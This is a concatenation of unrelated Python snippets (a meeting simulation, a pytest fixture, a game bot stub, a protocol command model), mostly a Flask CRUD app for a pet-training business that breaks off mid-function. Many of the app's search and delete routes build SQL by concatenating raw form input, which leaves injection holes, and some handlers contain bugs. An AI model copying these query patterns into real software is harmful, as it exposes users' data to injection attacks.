self.minutes.append(idea)
preidea = idea
self.callback()
self.k += 1
self.after()
def callback(self):
if self.draw:
ix = self.minutes[-2][0][0]
iy = self.minutes[-2][0][1]
jx = self.minutes[-1][0][0]
jy = self.minutes[-1][0][1]
l1 = self.ax.plot([ix, jx], [iy, jy], color='b', alpha=0.5)
self.ax.text((ix + jx) / 2, (iy + jy) / 2, self.k)
else:
pass
def after(self):
if self.draw:
plt.show()
else:
pass
if __name__ == '__main__':
import multiprocessing as mp
cp = mp.cpu_count() * 2
pool = mp.Pool
trial = 1000
N = np.arange(1, 15)
def wrapper(arg):
return arg[0](arg[1], arg[2])
def calc_N_phi(_N, trial):
_phi = []
for t in range(trial):
meeting = Meeting(K=50, N=_N, r=0.07, draw=False)
meeting.progress()
tmp = []
for p0, p1 in zip(meeting.minutes[:-1], meeting.minutes[1:]):
tmp.append(euc(p0[0], p1[0]))
_phi.append(np.average(np.array(tmp)))
return np.average(np.array(_phi))
jobs = [(calc_N_phi, _N, trial) for _N in N]
phi4 = pool(cp).map(wrapper, jobs)
fig = plt.figure(figsize=(16, 12))
ax = fig.add_subplot(111)
ax.plot(N, phi4)
ax.set_xlabel(r'A number of participants: $N$')
ax.set_ylabel(r"Average length of each edges: $\phi$")
plt.show()
|
import io
import pytest
@pytest.fixture
def config():
sample_config = (
b"triggers:\n" b' - trigger: "test"\n' b' sound: "/path/to/file.mp3"\n'
)
return io.TextIOWrapper(io.BytesIO(sample_config))
|
from tools import *
from objects import *
from routines import *
from routinesUnderConstruction import *
#This file is for strategy
## TODO: investigate why module imports are requested by PyCharm, yet they break the bot (everything's in the same module)
# from altAmazonv2.objects import GoslingAgent
# from altAmazonv2.routines import kickoff, atba
# from altAmazonv2.tools import find_hits
# from altAmazonv2.utils import defaultPD, defaultThrottle
# from altAmazonv2.routinesUnderConstruction import always_shoot
class BotLogic(GoslingAgent):
def run(agent):
if len(agent.stack) < 1:
agent.push(short_shot(agent.foe_goal.location))
'''
## BASIC FUNCTIONALITY - uncomment this block to get 'Pro' level bot
def run(agent):
## Routines interacting with the stack:
if len(agent.stack) < 1:
# if agent.kickoff_flag:
# agent.push(kickoff())
targets = {"goal" : (agent.foe_goal.left_post, agent.foe_goal.right_post)}
shots = find_hits(agent, targets)
if len(shots["goal"]) > 0:
agent.push(shots["goal"][0])
else:
relative = agent.friend_goal.location - agent.me.location
defaultPD(agent, agent.me.local(relative))
defaultThrottle(agent, 1410)
'''
'''
## TODO: add z axis interpretation
close = (agent.me.location - agent.ball.location).magnitude() < 2000
have_boost = agent.me.boost >= 18
my_net_to_ball = (agent.ball.location - agent.friend_goal.location).normalize()
my_distance = mynet2ball.dot()
my_poorpos = abs(agent.friend_goal.location.y - agent.me.location.y) - 200 > abs(
agent.friend_goal.location.y - agent.ball.location.y)
foe_poorpos = abs(agent.foe_goal.location.y - agent.foes[0].location.y) - 200 > abs(
agent.foe_boal.location.y - agent.ball.location.y)
if agent.team == 0:
agent.debug_stack()
print(close)
if len(agent.stack) < 1:
if agent.kickoff_flag:
agent.push(kickoff())
'''
|
"""Wait for resume command request, result, and implementation models."""
from __future__ import annotations
from pydantic import BaseModel, Field
from typing import TYPE_CHECKING, Optional, Type
from typing_extensions import Literal
from .command import AbstractCommandImpl, BaseCommand, BaseCommandCreate
if TYPE_CHECKING:
from ..execution import RunControlHandler
# NOTE: multiple values accepted for backwards compatibility
# with the 6.0.0-beta.0 release, which used `pause`
WaitForResumeCommandType = Literal["waitForResume", "pause"]
class WaitForResumeParams(BaseModel):
"""Payload required to pause the protocol."""
message: Optional[str] = Field(
None,
description="A user-facing message associated with the pause",
)
class WaitForResumeResult(BaseModel):
"""Result data from the execution of a WaitForResume command."""
class WaitForResumeImplementation(
AbstractCommandImpl[WaitForResumeParams, WaitForResumeResult]
):
"""Wait for resume command implementation."""
def __init__(self, run_control: RunControlHandler, **kwargs: object) -> None:
self._run_control = run_control
async def execute(self, params: WaitForResumeParams) -> WaitForResumeResult:
"""Dispatch a PauseAction to the store to pause the protocol."""
await self._run_control.wait_for_resume()
return WaitForResumeResult()
class WaitForResume(BaseCommand[WaitForResumeParams, WaitForResumeResult]):
"""Wait for resume command model."""
commandType: WaitForResumeCommandType = "waitForResume"
params: WaitForResumeParams
result: Optional[WaitForResumeResult]
_ImplementationCls: Type[WaitForResumeImplementation] = WaitForResumeImplementation
class WaitForResumeCreate(BaseCommandCreate[WaitForResumeParams]):
"""Wait for resume command request model."""
commandType: WaitForResumeCommandType = "waitForResume"
params: WaitForResumeParams
_CommandCls: Type[WaitForResume] = WaitForResume
|
from flask import Flask, render_template
from flask import request, redirect
from db_connector.db_connector import connect_to_database, execute_query
#create the web application
webapp = Flask(__name__)
'''
#provide a route where requests on the web application can be addressed
@webapp.route('/index')
#provide a view (fancy name for a function) which responds to any requests on this route
def hello():
return render_template(index.html)
'''
@webapp.route('/')
def index():
return render_template('index.html')
@webapp.route('/index.html')
def home():
return render_template('index.html')
@webapp.route('/customers.html', methods=['GET', 'POST'])
def customers():
db_connection = connect_to_database()
# Query vet options to populate pet form drop-down menu
query = 'SELECT vet_id, first_name, last_name, specialty FROM vets'
vets_result = execute_query(db_connection, query)
# Query customer options to populate pet form drop-down menu
query = 'SELECT customer_id, first_name, last_name FROM customers'
customers_result = execute_query(db_connection, query)
if request.method == 'POST':
# They submitted a form
if request.form['action'] == 'addCustomer':
# They want to insert a new Customer record into the database
# Get customer data from form fields
customer_data = {
"First Name": request.form.get('first-name'),
"Last Name": request.form.get('last-name'),
"Email": request.form.get('email-address'),
"Phone Number": request.form.get('phone-number'),
"Street Address": request.form.get('street-address'),
"City": request.form.get('city'),
"State": request.form.get('state'),
"Zip Code": request.form.get('zip')
}
# Check for any empty fields (all required in this form)
missing_fields = []
for field in customer_data.keys():
if customer_data[field] == "":
missing_fields.append(field)
if len(missing_fields) > 0:
feedback = f"Correct missing information: {missing_fields}"
return render_template('customers.html', customer_reg_result=feedback, vet_options=vets_result, customer_options=customers_result)
# If no fields missing, do the insert
query = 'INSERT INTO customers (first_name, last_name, email, phone, address, city, state, zip_code) VALUES (%s,%s,%s,%s,%s,%s,%s,%s)'
data = (customer_data["First Name"],
customer_data["Last Name"],
customer_data["Email"],
customer_data["Phone Number"],
customer_data["Street Address"],
customer_data["City"],
customer_data["State"],
customer_data["Zip Code"])
try:
result = execute_query(db_connection, query, data)
if result:
feedback = f"Added Customer {customer_data['First Name']} {customer_data['Last Name']}"
else:
feedback = "Add Customer Failed."
except:
feedback = "Add Customer Failed."
# Render page with query execution feeback
return render_template('customers.html', customer_reg_result=feedback, vet_options=vets_result, customer_options=customers_result)
elif request.form['action'] == 'addPet':
# They want to add a new Pet to an existing Customer
# Get pet data from form fields
pet_data = {
"Customer ID": request.form.get('customer-select'),
"Pet Name": request.form.get('pet-name'),
"Pet Species": request.form.get('pet-species'),
"Pet Breed": request.form.get('pet-breed'),
"Pet Age": request.form.get('pet-age'),
"Pet Gender": request.form.get('pet-gender'),
"Veterinarian Choice": request.form.get('vet'),
}
# Check for any empty fields (all required in this form)
missing_fields = []
for field in pet_data.keys():
if pet_data[field] == "":
missing_fields.append(field)
if len(missing_fields) > 0:
feedback = f"Correct missing information: {missing_fields}"
return render_template('customers.html', customer_reg_result=feedback, vet_options=vets_result, customer_options=customers_result)
# If no fields missing, do the insert
query = 'INSERT INTO pets (pet_name, species, breed, age, gender, vet_id, customer_id) VALUES (%s,%s,%s,%s,%s,%s,%s)'
data = (pet_data["Pet Name"],
pet_data["Pet Species"],
pet_data["Pet Breed"],
pet_data["Pet Age"],
pet_data["Pet Gender"],
pet_data["Veterinarian Choice"],
pet_data["Customer ID"])
try:
result = execute_query(db_connection, query, data)
if result:
feedback = f"Added Pet {pet_data['Pet Name']}"
else:
feedback = "Add Pet Failed."
except:
feedback = "Add Pet Failed."
# Render page with query execution feeback
return render_template('customers.html', customer_reg_result=feedback, vet_options=vets_result, customer_options=customers_result)
# Just render the base webpage
return render_template('customers.html', vet_options=vets_result, customer_options=customers_result)
@webapp.route('/pets.html', methods=['GET', 'POST'])
def pets():
db_connection = connect_to_database()
result = ''
# Query customer options to populate pet search drop-down menu
query = 'SELECT customer_id, first_name, last_name FROM customers'
customers_result = execute_query(db_connection, query).fetchall()
# Query pet names to populate pet search dropdown
pet_names_query = 'SELECT pet_id, pet_name, species FROM pets'
pet_result = execute_query(db_connection, pet_names_query).fetchall()
if request.method == 'POST':
# They submitted the form
if request.form['searchPets'] == 'customerName':
customerName = request.form.get('select-customer-name').split()
# One name provided - could be first or last
if len(customerName) == 1:
name = customerName[0]
query = "SELECT * FROM pets where customer_id = (SELECT customer_id FROM customers WHERE first_name = '" + name + "' OR last_name = '" + name + "')"
# Two names provided - first and last
elif len(customerName) == 2:
first = customerName[0]
last = customerName[1]
query = "SELECT * FROM pets where customer_id = (SELECT customer_id FROM customers WHERE first_name = '" + first + "' AND last_name = '" + last + "')"
# Execute the query
result = execute_query(db_connection, query).fetchall()
print()
print(result)
elif request.form['searchPets'] == 'petName':
petName = request.form.get('select-pet-name')
query = "SELECT * FROM pets where pet_name = '" + petName + "'"
result = execute_query(db_connection, query).fetchall()
elif request.form['searchPets'] == 'petType':
petType = request.form.get('select-pet-species')
query = "SELECT * FROM pets WHERE species = '" + petType + "' OR breed = '" + petType + "'"
result = execute_query(db_connection, query).fetchall()
return render_template('pets.html', rows=result, customer_list=customers_result, pet_list=pet_result)
else:
return render_template('pets.html', customer_list=customers_result, pet_list=pet_result)
@webapp.route('/classes.html', methods=['GET', 'POST'])
def classes():
db_connection = connect_to_database()
# Get all existing data from Classes table for dropdowns
# I found out how to do this from the following site:
# https://stackoverflow.com/questions/50593981/populate-html-drop-down
# -using-data-from-postgresql-database-using-python-flask
# get data for selecting by class name
class_name_query = "SELECT class_name FROM classes"
class_tuple = execute_query(db_connection, class_name_query).fetchall()
# turn class_day_list into a list instead of a tuple
# https://www.geeksforgeeks.org/python-convert-list-of-tuples-into-list/
class_list = [item for x in class_tuple for item in x]
class_day_query = "SELECT DISTINCT DAYNAME(class_day) FROM classes"
class_day_tuple = execute_query(db_connection, class_day_query).fetchall()
# turn class_day_list into a list instead of a tuple
# https://www.geeksforgeeks.org/python-convert-list-of-tuples-into-list/
class_day_list = [item for t in class_day_tuple for item in t]
class_time_query = "SELECT DISTINCT HOUR(class_time) as time FROM classes ORDER BY time ASC"
class_time_tuple = execute_query(db_connection, class_time_query).fetchall()
class_time_list = [item for t in class_time_tuple for item in t]
# If the user does a search on the classes table...
if request.method == 'POST':
# Get pet naems for enrollment
pet_name_query = "SELECT pet_name FROM pets"
pet_tuple = execute_query(db_connection, pet_name_query).fetchall()
pet_list = [item for x in pet_tuple for item in x]
# They submitted the form
if request.form['searchClasses'] == 'className':
className = request.form.get('select-class-name')
query = "SELECT * FROM classes WHERE class_name = '" + className + "'"
result = execute_query(db_connection, query).fetchall()
# Selected a day to search by
elif request.form['searchClasses'] == 'day':
day = request.form.get('select-class-day')
query = "SELECT * FROM classes WHERE DAYNAME(class_day) = '" + day + "'"
result = execute_query(db_connection, query).fetchall()
# Selected a time to search by
elif request.form['searchClasses'] == 'time':
time = request.form.get('select-class-time')
query = "SELECT * FROM classes WHERE HOUR(class_time) = '" + time + "'"
result = execute_query(db_connection, query).fetchall()
# Selected a price to search by
elif request.form['searchClasses'] == 'price':
price = request.form.get('price-range')
query = "SELECT * FROM classes WHERE class_price <= " + str(price)
result = execute_query(db_connection, query).fetchall()
if result is None:
result = "No prices at or below" + str(price)
# Get pet naems for enrollment
pet_name_query = "SELECT pet_name FROM pets"
pet_tuple = execute_query(db_connection, pet_name_query).fetchall()
pet_list = [item for x in pet_tuple for item in x]
return render_template('classes.html', rows=result, class_list=class_list, class_day=class_day_list,
class_time=class_time_list, pet_name=pet_list)
else:
# They're just visiting the page for the first time
#return render_template('classes.html')
return render_template("classes.html", class_list=class_list, class_day=class_day_list, class_time=class_time_list)
# @webapp.route('/classes.html', methods=['POST'])
# def classes_search_enroll():
# db_connection = connect_to_database()
# # If a Class search populated the table
# if request.method == 'POST':
# if request.form.get('enroll-pet-class-search'):
# print('clicked enroll pet')
# # Get class data from form fields
# enroll_data = {
# "Pet Name": request.form.get('select_pet_name_class_search'),
# "Class Name": request.form.get('class_name_class_search')
# }
# query = 'INSERT INTO enrollments (pet_id, class_id) VALUES ((SELECT pet_id FROM pets WHERE pet_name = %s), (SELECT class_id FROM classes WHERE class_name = %s))'
# data = (enroll_data["Pet Name"],
# enroll_data["Class Name"])
# execute_query(db_connection, query, data)
# return render_template('classes.html')
@webapp.route('/vets.html', methods=['GET','POST'])
def vets():
db_connection = connect_to_database()
# Query vet options to populate pet search drop-down menu
vets_query = 'SELECT vet_id, first_name, last_name, specialty FROM vets'
vet_result = execute_query(db_connection, vets_query).fetchall()
# Query pet names to populate pet search dropdown
pet_names_query = 'SELECT pet_id, pet_name, species FROM pets'
pet_result = execute_query(db_connection, pet_names_query).fetchall()
if request.method == 'POST':
# They submitted the form
if request.form['vetSearchType'] == 'vetName':
vetName = request.form.get('select-vet-name').split()
# One name provided - could be first or last
if len(vetName) == 1:
name = vetName[0]
query = "SELECT * FROM vets WHERE first_name = '" + name + "' OR last_name = '" + name + "'"
# Two names provided - first and last
elif len(vetName) == 2:
first = vetName[0]
last = vetName[1]
query = "SELECT * FROM vets WHERE first_name = '" + first + "' AND last_name = '" + last + "'"
result = execute_query(db_connection, query).fetchall()
elif request.form['vetSearchType'] == 'vetSpecialty':
specialty = request.form.get('select-vet-specialty')
query = "SELECT * FROM vets WHERE specialty LIKE '%%" + specialty + "%%'"
result = execute_query(db_connection, query).fetchall()
elif request.form['vetSearchType'] == 'petName':
petName = request.form.get('select-pet-name')
if petName is None:
result = "No vet for this pet"
else:
query = "SELECT * FROM vets WHERE vet_id = (SELECT vet_id FROM pets WHERE pet_name = '" + petName + "')"
result = execute_query(db_connection, query).fetchall()
return render_template('vets.html', rows=result, vet_list=vet_result, pet_list=pet_result)
else:
# They're just visiting the page for the first time
return render_template('vets.html', vet_list=vet_result, pet_list=pet_result)
def refresh_admin(feedback=None):
db_connection = connect_to_database()
# Display customer table
customer_query = 'SELECT * from customers'
customer_result = execute_query(db_connection, customer_query).fetchall()
# Display pets table
pet_query = 'SELECT * from pets'
pet_result = execute_query(db_connection, pet_query).fetchall()
# Display classes table
classes_query = 'SELECT * from classes'
classes_result = execute_query(db_connection, classes_query).fetchall()
# display enrollments table
enroll_query = 'SELECT * from enrollments'
enroll_result = execute_query(db_connection, enroll_query).fetchall()
# Display teachers table
teacher_query = 'SELECT * from teachers'
teacher_result = execute_query(db_connection, teacher_query).fetchall()
# Display vets table
vet_query = 'SELECT * from vets'
vet_result = execute_query(db_connection, vet_query).fetchall()
# Get data for dropdowns -- get customer names
customer_names_query = "SELECT customer_id, first_name, last_name FROM customers"
customer_names_result = execute_query(db_connection, customer_names_query).fetchall()
# Get vet names for dropdowns
vet_name_query = "SELECT vet_id, first_name, last_name FROM vets"
vet_names_result = execute_query(db_connection, vet_name_query).fetchall()
# Get class name for dropdowns
class_name_query = "SELECT class_id, class_name FROM classes"
class_name_result = execute_query(db_connection, class_name_query).fetchall()
# Get teacher name for dropdowns
teacher_name_query = "SELECT teacher_id, first_name, last_name FROM teachers"
teacher_name_result = execute_query(db_connection, teacher_name_query).fetchall()
# Pet name for dropdowns
pet_name_query = "SELECT pet_id, pet_name FROM pets"
pet_name_result = execute_query(db_connection, pet_name_query).fetchall()
# Return info from all tables
if feedback:
return render_template('admin.html', rows=customer_result, pets=pet_result, classes = classes_result,
enroll=enroll_result, vet=vet_result, teacher=teacher_result, feedback=feedback,
customerNames=customer_names_result,
vetNames=vet_names_result, classNames=class_name_result, teacherNames=teacher_name_result,
ames=pet_name_result)
return render_template('admin.html', rows=customer_result, pets=pet_result, classes = classes_result, enroll=enroll_result, vet=vet_result,
teacher=teacher_result, customerNames=customer_names_result,
vetNames=vet_names_result, classNames=class_name_result,
teacherNames=teacher_name_result, petNames=pet_name_result)
@webapp.route('/admin.html', methods=['GET', 'POST'])
def admin():
# If the user is simply going to the admin page, display all info in all tables
if request.method == 'GET':
return refresh_admin()
# If users are inserting new information into the tables on the admin page
if request.method == 'POST':
# Set up feedback
feedback = {"Customers": "",
"Pets": "",
"Classes": "",
"Enrollments": "",
"Teachers": "",
"Vets": ""}
db_connection = connect_to_database()
# They submitted a form to update a customer
if request.form.get('customer-update'):
# Get customer data from form fields
customer_data = {
"First Name": request.form.get('customer-first-name'),
"Last Name": request.form.get('customer-last-name'),
"Email": request.form.get('customer-email'),
"Phone Number": request.form.get('customer-phone'),
"Street Address": request.form.get('customer-address'),
"City": request.form.get('customer-city'),
"State": request.form.get('customer-state'),
"Zip Code": request.form.get('customer-zip-code'),
"Customer ID": request.form.get('customer-id')
}
# If no fields missing, do the insert
query = 'UPDATE customers SET first_name = %s, last_name = %s, email = %s, phone = %s, address = %s, city = %s, state = %s, zip_code = %s WHERE customer_id = %s'
data = (customer_data["First Name"],
customer_data["Last Name"],
customer_data["Email"],
customer_data["Phone Number"],
customer_data["Street Address"],
customer_data["City"],
customer_data["State"],
customer_data["Zip Code"],
customer_data["Customer ID"])
try:
result = execute_query(db_connection, query, data)
if result:
feedback = f"Updated Customer {customer_data['First Name']} {customer_data['Last Name']}"
else:
feedback = "Update Customer Failed."
except:
feedback = "Update Customer Failed."
return refresh_admin(feedback), refresh_admin()
# If they request to update a Pet
elif request.form.get('pet-update'):
# Get pet data from form fields
pet_data = {
"Pet Name": request.form.get('pet-name'),
"Pet Species": request.form.get('pet-species'),
"Pet Breed": request.form.get('pet-breed'),
"Pet Age": request.form.get('pet-age'),
"Pet Gender": request.form.get('pet-gender'),
"Vet First Name": request.form.get('vet_name_update_select').split()[0],
"Vet Last Name": request.form.get('vet_name_update_select').split()[1],
"Customer First Name": request.form.get('customer_name__update_select').split()[0],
"Customer Last Name": request.form.get('customer_name__update_select').split()[1],
"Pet ID": request.form.get('pet-id')
}
# Do the update
query = 'UPDATE pets SET pet_name = %s, species = %s, breed = %s, age = %s, gender = %s, vet_id = (SELECT vet_id from vets where first_name = %s and last_name = %s), customer_id = (SELECT customer_id from customers where first_name = %s and last_name = %s) WHERE pet_id = %s'
data = (pet_data["Pet Name"],
pet_data["Pet Species"],
pet_data["Pet Breed"],
pet_data["Pet Age"],
pet_data["Pet Gender"],
pet_data["Vet First Name"],
pet_data["Vet Last Name"],
pet_data["Customer First Name"],
pet_data["Customer Last Name"],
pet_data["Pet ID"])
try:
result = execute_query(db_connection, query, data)
if result:
feedback = f"Updated Pet {pet_data['Pet Name']}"
else:
feedback = "Update Pets Failed."
except:
feedback = "Update Pets Failed."
return refresh_admin(feedback), refresh_admin()
# If they submitted to update a Class
elif request.form.get('class-update'):
# Get class data from form fields
class_data = {
"Class Name": request.form.get('class-name'),
"Class Description": request.form.get('class-description'),
"Class Day": request.form.get('class-day'),
"Class Time": request.form.get('class-time'),
"Class Price": request.form.get('class-price'),
"Class Seats": request.form.get('class-seats'),
"Teacher First Name": request.form.get('teacher_name_update_select').split()[0],
"Teacher Last Name": request.form.get('teacher_name_update_select').split()[1],
"Class ID": request.form.get('class-id')
}
# Do the update
query = 'UPDATE classes SET class_name = %s, class_description = %s, class_day = %s, class_time = %s, class_price = %s, class_seats = %s, teacher_id = (SELECT teacher_id from teachers where first_name = %s and last_name = %s) WHERE class_id = %s'
data = (class_data["Class Name"],
class_data["Class Description"],
class_data["Class Day"],
class_data["Class Time"],
class_data["Class Price"],
class_data["Class Seats"],
class_data["Teacher First Name"],
class_data["Teacher Last Name"],
class_data["Class ID"])
try:
result = execute_query(db_connection, query, data)
if result:
feedback = f"Updated Class {class_data['Class Name']}"
else:
feedback = "Update Class Failed."
except:
feedback = "Update Class Failed."
return refresh_admin(feedback), refresh_admin()
# If they requested to update an Enrollment
elif request.form.get('enrollment-update'):
# Get enrollment data from form fields
enrollment_data = {
"Pet Name": request.form.get('pet_name_update_select'),
"Class Name": request.form.get('class_name_update_select'),
"Enrollment ID": request.form.get('enroll-id')
}
# Do the update
query = 'UPDATE enrollments SET pet_id = (SELECT pet_id from pets where pet_name = %s), class_id = (SELECT class_id from classes where class_name = %s) WHERE enrollment_id = %s'
data = (enrollment_data["Pet Name"],
enrollment_data["Class Name"],
enrollment_data["Enrollment ID"])
try:
result = execute_query(db_connection, query, data)
if result:
feedback = f"Updated Enrollment {class_data['Enrollment Name']}"
else:
feedback = "Update Enrollment Failed."
except:
feedback = "Update Enrollment Failed."
return refresh_admin(feedback), refresh_admin()
# If they submitted to update a teacher
elif request.form.get('teacher-update'):
# Get teacher data from form fields
teacher_data = {
"Teacher First Name": request.form.get('teacher-first-name'),
"Teacher Last Name": request.form.get('teacher-last-name'),
"Teacher Email": request.form.get('teacher-email'),
"Teacher Phone": request.form.get('teacher-phone'),
"Teacher ID": request.form.get('teacher-id')
}
# Do the update
query = 'UPDATE teachers SET first_name = %s, last_name = %s, email = %s, phone = %s WHERE teacher_id = %s'
data = (teacher_data["Teacher First Name"],
teacher_data["Teacher Last Name"],
teacher_data["Teacher Email"],
teacher_data["Teacher Phone"],
teacher_data["Teacher ID"])
try:
result = execute_query(db_connection, query, data)
if result:
feedback = f"Updated Teacher {teacher_data['Teacher First Name']} {teacher_data['Teacher Last Name']}"
else:
feedback = "Update Teacher Failed."
except:
feedback = "Update Teacher Failed."
return refresh_admin(feedback), refresh_admin()
# If they submitted to update a vet
elif request.form.get('vet-update'):
# Get vet data from form fields
vet_data = {
"Vet First Name": request.form.get('vet-first-name'),
"Vet Last Name": request.form.get('vet-last-name'),
"Vet Email": request.form.get('vet-email'),
"Vet Phone": request.form.get('vet-phone'),
"Vet Specialty": request.form.get('vet-specialty'),
"Vet ID": request.form.get('vet-id')
}
# Do the update
query = 'UPDATE vets SET first_name = %s, last_name = %s, email = %s, phone = %s, specialty = %s WHERE vet_id = %s'
data = (vet_data["Vet First Name"],
vet_data["Vet Last Name"],
vet_data["Vet Email"],
vet_data["Vet Phone"],
vet_data["Vet Specialty"],
vet_data["Vet ID"])
try:
result = execute_query(db_connection, query, data)
if result:
feedback = f"Updated Vet {vet_data['Vet First Name']} {vet_data['Vet Last Name']}"
else:
feedback = "Update Vet Failed."
except:
feedback = "Update Vet Failed."
return refresh_admin(feedback), refresh_admin()
# If they submitted to delete a customer
elif request.form.get('customer-delete'):
customer_id = request.form.get('customer-delete')
query = "DELETE FROM customers WHERE customer_id = '" + customer_id + "'"
execute_query(db_connection, query)
return refresh_admin()
# If they submitted to delete a pet
elif request.form.get('pet-delete'):
pet_id = request.form.get('pet-delete')
query = "DELETE FROM pets WHERE pet_id = '" + pet_id + "'"
execute_query(db_connection, query)
return refresh_admin()
# If they submitted to delete a class
elif request.form.get('class-delete'):
class_id = request.form.get('class-delete')
query = "DELETE FROM classes WHERE class_id = '" + class_id + "'"
execute_query(db_connection, query)
return refresh_admin()
# If they submitted to delete an enrollment
elif request.form.get('enroll-delete'):
enrollment_id = request.form.get('enroll-delete')
query = "DELETE FROM enrollments WHERE enrollment_id = '" + enrollment_id + "'"
execute_query(db_connection, query)
return refresh_admin()
# If they submitted to delete a teacher
elif request.form.get('teacher-delete'):
teacher_id = request.form.get('teacher-delete')
query = "DELETE FROM teachers WHERE teacher_id = '" + teacher_id + "'"
execute_query(db_connection, query)
return refresh_admin()
# If they submitted to delete a vet
elif request.form.get('vet-delete'):
vet_id = request.form.get('vet-delete')
query = "DELETE FROM vets WHERE vet_id = '" + vet_id + "'"
execute_query(db_connection, query)
return refresh_admin()
# If they submitted to add a new customer
elif request.form.get('customer-insert'):
# Get customer data from form fields
customer_data = {
"First Name": request.form.get('customer_first_name'),
"Last Name": request.form.get('customer_last_name'),
"Email": request.form.get('customer_email'),
"Phone Number": request.form.get('customer_phone'),
"Street Address": request.form.get('customer_address'),
"City": request.form.get('customer_city'),
"State": request.form.get('customer_state'),
"Zip Code": request.form.get('customer_zip')
}
# Check for any empty fields (all required in this form)
missing_fields = []
for field in customer_data.keys():
if customer_data[field] == "":
missing_fields.append(field)
if len(missing_fields) > 0:
feedback["Customers"] = f"Correct missing information: {missing_fields}"
# If no fields missing, do the insert
else:
query = 'INSERT INTO customers (first_name, last_name, email, phone, address, city, state, zip_code) VALUES (%s,%s,%s,%s,%s,%s,%s,%s)'
data = (customer_data["First Name"],
customer_data["Last Name"],
customer_data["Email"],
customer_data["Phone Number"],
customer_data["Street Address"],
customer_data["City"],
customer_data["State"],
customer_data["Zip Code"])
try:
result = execute_query(db_connection, query, data)
if result:
feedback["Customers"] = f"Added Customer {customer_data['First Name']} {customer_data['Last Name']}"
else:
feedback["Customers"] = "Add Customer Failed."
except:
feedback["Customers"] = "Add Customer Failed."
return refresh_admin(feedback)
# If they submitted a new pet
elif request.form.get('pet-insert'):
# Get pet data from form fields
pet_data = {
"Pet Name": request.form.get('pet_name'),
"Species": request.form.get('pet_species'),
"Breed": request.form.get('pet_breed'),
"Age": request.form.get('pet_age'),
"Gender": request.form.get('pet_gender'),
"Vet First Name": request.form.get('vet_name_select').split()[0],
"Vet Last Name": request.form.get('vet_name_select').split()[1],
"Customer First Name": request.form.get('customer_name_select').split()[0],
"Customer Last Name": request.form.get('customer_name_select').split()[1]
}
# Check for any empty fields (all required in this form)
missing_fields = []
for field in pet_data.keys():
if pet_data[field] == "":
missing_fields.append(field)
if len(missing_fields) > 0:
feedback["Pets"] = f"Correct missing information: {missing_fields}"
# If no fields missing, do the insert
else:
query = 'INSERT INTO pets (pet_name, species, breed, age, gender, vet_id, customer_id) VALUES (%s,%s,%s,%s,%s, (SELECT vet_id from vets where first_name = %s and last_name = %s),(SELECT customer_id from customers where first_name = %s and last_name = %s))'
data = (pet_data["Pet Name"],
pet_data["Species"],
pet_data["Breed"],
pet_data["Age"],
pet_data["Gender"],
pet_data["Vet First Name"],
pet_data["Vet Last Name"],
pet_data["Customer First Name"],
pet_data["Customer Last Name"])
try:
result = execute_query(db_connection, query, data)
if result:
feedback["Pets"] = f"Added Pet {pet_data['Pet Name']}"
else:
feedback["Pets"] = "Add Pet Failed."
except:
feedback["Pets"] = "Add Pet Failed."
return refresh_admin(feedback), refresh_admin()
# If they submitted a new class
elif request.form.get('class-insert'):
# Get class data from form fields
class_data = {
"Class Name": request.form.get('class_name'),
"Class Description": request.form.get('class_description'),
"Class Day": request.form.get('class_day'),
"Class Time": request.form.get('class_time'),
"Class Price": request.form.get('class_price'),
"Class Seats": request.form.get('class_seats'),
"Teacher First Name": request.form.get('teacher_name_select').split()[0],
"Teacher Last Name": request.form.get('teacher_name_select').split()[1]
}
# Check for any empty fields (all required in this form)
missing_fields = []
for field in class_data.keys():
if class_data[field] == "":
missing_fields.append(field)
if len(missing_fields) > 0:
feedback["Classes"] = f"Correct missing information: {missing_fields}"
# If no fields missing, do the insert
else:
query = 'INSERT INTO classes (class_name, class_description, class_day, class_time, class_price, class_seats, teacher_id) VALUES (%s, %s, %s, %s, %s,%s, (SELECT teacher_id from teachers where first_name = %s and last_name = %s))'
data = (class_data["Class Name"],
class_data["Class Description"],
class_data["Class Day"],
class_data["Class Time"],
class_data["Class Price"],
class_data["Class Seats"],
class_data["Teacher First Name"],
class_data["Teacher Last Name"])
try:
result = execute_query(db_connection, query, data)
if result:
feedback["Classes"] = f"Added Class {class_data['Class Name']}"
else:
feedback["Classes"] = "Add Class Failed."
except:
feedback["Classes"] = "Add Class Failed."
return refresh_admin(feedback), refresh_admin()
# If they submitted a new enrollment
elif request.form.get('enroll-insert'):
# Get class data from form fields
enroll_data = {
"Pet Name": request.form.get('pet_name'),
"Class Name": request.form.get('class_name')
}
# Check for any empty fields (all required in this form)
missing_fields = []
for field in enroll_data.keys():
if enroll_data[field] == "":
missing_fields.append(field)
if len(missing_fields) > 0:
feedback["Enrollments"] = f"Correct missing information: {missing_fields}"
# If no fields missing, do the insert
else:
query = 'INSERT INTO enrollments (pet_id, class_id) VALUES ((SELECT pet_id FROM pets WHERE pet_name = %s), (SELECT class_id FROM classes WHERE class_name = %s))'
data = (enroll_data["Pet Name"],
enroll_data["Class Name"])
try:
result = execute_query(db_connection, query, data)
if result:
feedback["Enrollments"] = f"Added Enrollment {enroll_data['Pet Name']} {enroll_data['Class Name']}"
else:
feedback["Enrollments"] = "Add Enrollment Failed."
except:
feedback["Enrollments"] = "Add Enrollment Failed."
return refresh_admin(feedback), refresh_admin()
# If they submitted a new teacher
elif request.form.get('teacher-insert'):
# Get class data from form fields
teacher_data = {
"Teacher First Name": request.form.get('teacher_first_name'),
"Teacher Last Name": request.form.get('teacher_last_name'),
"Teacher Email": request.form.get('teacher_email'),
"Teacher Phone": request.form.get('teacher_phone'),
}
# Check for any empty fields (all required in this form)
missing_fields = []
for field in teacher_data.keys():
if teacher_data[field] == "":
missing_fields.append(field)
if len(missing_fields) > 0:
feedback["Teachers"] = f"Correct missing information: {missing_fields}"
# If no fields missing, do the insert
else:
query = 'INSERT INTO teachers (first_name, last_name, email, phone) VALUES (%s, %s, %s, %s)'
data = (teacher_data["Teacher First Name"],
teacher_data["Teacher Last Name"],
teacher_data["Teacher Email"],
teacher_data["Teacher Phone"])
try:
result = execute_query(db_connection, query, data)
if result:
feedback["Teachers"] = f"Added Teacher {teacher_data['Teacher First Name']} {teacher_data['Teacher Last Name']}"
else:
feedback["Teachers"] = "Add Teacher Failed."
except:
feedback["Teachers"] = "Add Teacher Failed."
return refresh_admin(feedback), refresh_admin()
# If they submitted a new vet
elif request.form.get('vet-insert'):
# Get class data from form fields
vet_data = {
"Vet First Name": request.form.get('vet_first_name'),
"Vet Last Name": request.form.get('vet_last_name'),
"Vet Email": request.form.get('vet_email'),
